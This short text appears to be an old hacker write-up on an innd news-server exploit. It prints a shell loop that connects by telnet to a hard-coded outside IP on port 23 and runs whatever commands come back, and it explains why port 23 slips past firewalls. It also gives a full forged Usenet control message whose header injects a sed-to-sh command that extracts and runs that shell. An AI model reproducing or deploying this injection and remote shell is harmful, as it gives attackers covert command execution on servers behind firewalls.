The "intruder-shell" is the following /bin/sh program: while :; do IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1` if [ X"$IN" != X"$OIN" ]; then (/bin/sleep 2; eval "$IN" 2>&1) | /bin/telnet 193.12.106.100 23 >/dev/null 2>&1 OIN=$IN fi sleep 30 done I will now try to explain how it works, repeat(forever) wait 2 seconds; connect to port 23 on 193.12.106.100; put the last line of what '193.12.106.100' gives us in variable $IN if $IN does not equal $OIN (Old IN) wait 2 seconds; evaluate $IN as a command and send the results to '193.12.106.100' (f.ex. $IN could be '/bin/ls -l /etc' ) assign the value of $IN to $OIN end // if wait 30 seconds end // repeat The port '23' is by no means a 'randomly choosed port'. It is choosed, because, even if most ports to/from a site are blocked with a router/firewall, port 23 is very often allowed to connect to the outside world. The reason ?? : Port 23 is the 'telnet' port. i.e. if a domain allows telnet connections out from it's news-server we're in luck ! ====================================================================================== A part of the first innd exploit was a remote shell that would be effective behind firewalls. Along with a replaced 'telnetd' on the attackers computer, this can be used as a "slow shell" to execute commands on a target behind a firewall. #################### START SLOW SHELL ################################# Path: skyrr.is!news.isnet.is!newsfeed.sunet.se!news99.sunet.se!newsfeed.luth.se!news.luth.se!eru.mt.luth.se!news.algonet.se!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back From: tale@uunet.uu.net (David C Lawrence) Newsgroups: comp.sys.mac.printing Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated Approved: newgroups-request@uunet.uu.net Message-ID: <830201540.9020@uunet.uu.net> Date: Sat, 15 Mar 1997 15:15:15 GMT Lines: 12 #+ while :; do IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1` if [ X"$IN" != X"$OIN" ]; then (/bin/sleep 2; eval "$IN" 2>&1) | /bin/telnet 193.12.106.100 23 >/dev/null 2>&1 OIN=$IN fi sleep 30 done #- #################### END SLOW SHELL #################################